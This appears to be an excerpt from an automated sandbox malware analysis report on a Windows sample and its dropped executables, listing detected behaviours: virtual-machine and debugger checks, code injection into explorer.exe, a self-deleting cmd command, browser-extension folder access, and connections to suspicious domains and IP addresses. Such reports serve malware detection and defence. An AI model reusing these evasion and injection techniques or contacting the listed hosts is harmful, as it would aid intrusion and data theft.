Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: file.exe, 00000000.00000002.356947410.00000000008CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK#V
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\uucbfdt Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\uucbfdt Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\uucbfdt Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\uucbfdt Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\uucbfdt Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\uucbfdt Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\405E.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\405E.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\405E.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\405E.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\405E.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\405E.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 4112 Thread sleep count: 650 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 4656 Thread sleep count: 276 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 4584 Thread sleep count: 227 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 792 Thread sleep count: 576 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 1412 Thread sleep count: 155 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 1444 Thread sleep count: 122 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5792 Thread sleep count: 143 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 5060 Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe Last function: Thread delayed
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 12_2_004019F0
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 650 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 576 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\37F1.exe API coverage: 9.1 %
Is looking for software installed on the system
Source: C:\Users\user\AppData\Local\Temp\5487.exe Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\AppData\Local\Temp\37F1.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5487.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: explorer.exe, 00000001.00000000.269533597.000000000464E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 30d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 5487.exe, 00000012.00000002.513831568.00000000009B3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX7
Source: explorer.exe, 00000001.00000000.323199405.00000000084D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.317110640.000000000683A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.278833693.00000000081DD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000^
Source: explorer.exe, 00000001.00000000.316449381.0000000006710000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: 5487.exe, 00000012.00000002.521372912.000000001AE98000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\.
Source: 5487.exe, 00000012.00000002.514521211.0000000000A04000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.321884280.0000000008304000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000001.00000000.353037520.00000000082B2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000001.00000000.278950861.0000000008200000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>&
Source: 37F1.exe, 0000000C.00000002.552906667.0000000008132000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging
barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\file.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\uucbfdt System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\405E.exe System information queried: CodeIntegrityInformation Jump to behavior
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 12_2_004019F0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 12_2_004019F0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0070092B mov eax, dword ptr fs:[00000030h] 0_2_0070092B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00700D90 mov eax, dword ptr fs:[00000030h] 0_2_00700D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008DC7A8 push dword ptr fs:[00000030h] 0_2_008DC7A8
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048D0D90 mov eax, dword ptr fs:[00000030h] 12_2_048D0D90
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048D092B mov eax, dword ptr fs:[00000030h] 12_2_048D092B
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\uucbfdt Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\405E.exe Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_0040CE09
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_0040ADB0 GetProcessHeap,HeapFree, 12_2_0040ADB0
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_0040CE09
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_0040E61C
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00416F6A
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_004123F1 SetUnhandledExceptionFilter, 12_2_004123F1
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048E2658 SetUnhandledExceptionFilter, 12_2_048E2658
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048DE883 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_048DE883
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048DD070 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_048DD070
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048E71D1 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_048E71D1

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: o36fafs3sn6xou.com
Source: C:\Windows\explorer.exe Domain query: furubujjul.net
Source: C:\Windows\explorer.exe Domain query: o3zxuhcc4hl9mi.com
Source: C:\Windows\explorer.exe Domain query: o3l3roozuidudu.com
Source: C:\Windows\explorer.exe Network Connect: 185.174.137.70 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: shingroup.com
Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 193.106.191.15 80
Source: C:\Windows\SysWOW64\explorer.exe Domain query: starvestitibo.org
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: 5999.exe.1.dr Jump to dropped file
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\file.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\uucbfdt Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\uucbfdt Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\405E.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\405E.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\5999.exe Memory written: C:\Users\user\AppData\Local\Temp\5999.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\file.exe Thread created: C:\Windows\explorer.exe EIP: 4E61ACC Jump to behavior
Source: C:\Users\user\AppData\Roaming\uucbfdt Thread created: unknown EIP: 4EC1ACC Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\405E.exe Thread created: unknown EIP: 5051A28 Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: E1F380 Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\explorer.exe Memory written: PID: 5220 base: E1F380 value: 90 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: PID: 3572 base: 7FF647908150 value: 90 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\5487.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\AppData\Local\Temp\5487.exe" & exit Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5999.exe Process created: C:\Users\user\AppData\Local\Temp\5999.exe C:\Users\user\AppData\Local\Temp\5999.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: explorer.exe, 00000001.00000000.267942114.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.341498193.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.312595073.0000000001080000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: XProgram Manager
Source: explorer.exe, 00000001.00000000.272834140.0000000005D90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.353277614.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.267942114.0000000001080000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.267707719.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.311720249.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.267942114.0000000001080000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.267942114.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.341498193.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.312595073.0000000001080000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\file.exe Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoW, 0_2_00412000
Source: C:\Users\user\Desktop\file.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 0_2_0041251C
Source: C:\Users\user\Desktop\file.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA, 0_2_00409B57
Source: C:\Users\user\Desktop\file.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_004183C4
Source: C:\Users\user\Desktop\file.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num, 0_2_00412B8A
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoW, 11_2_00412000
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 11_2_0041251C
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA, 11_2_00409B57
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 11_2_004183C4
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num, 11_2_00412B8A
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: GetLocaleInfoA, 12_2_00417A20
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: GetLocaleInfoA, 12_2_048E7C87
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
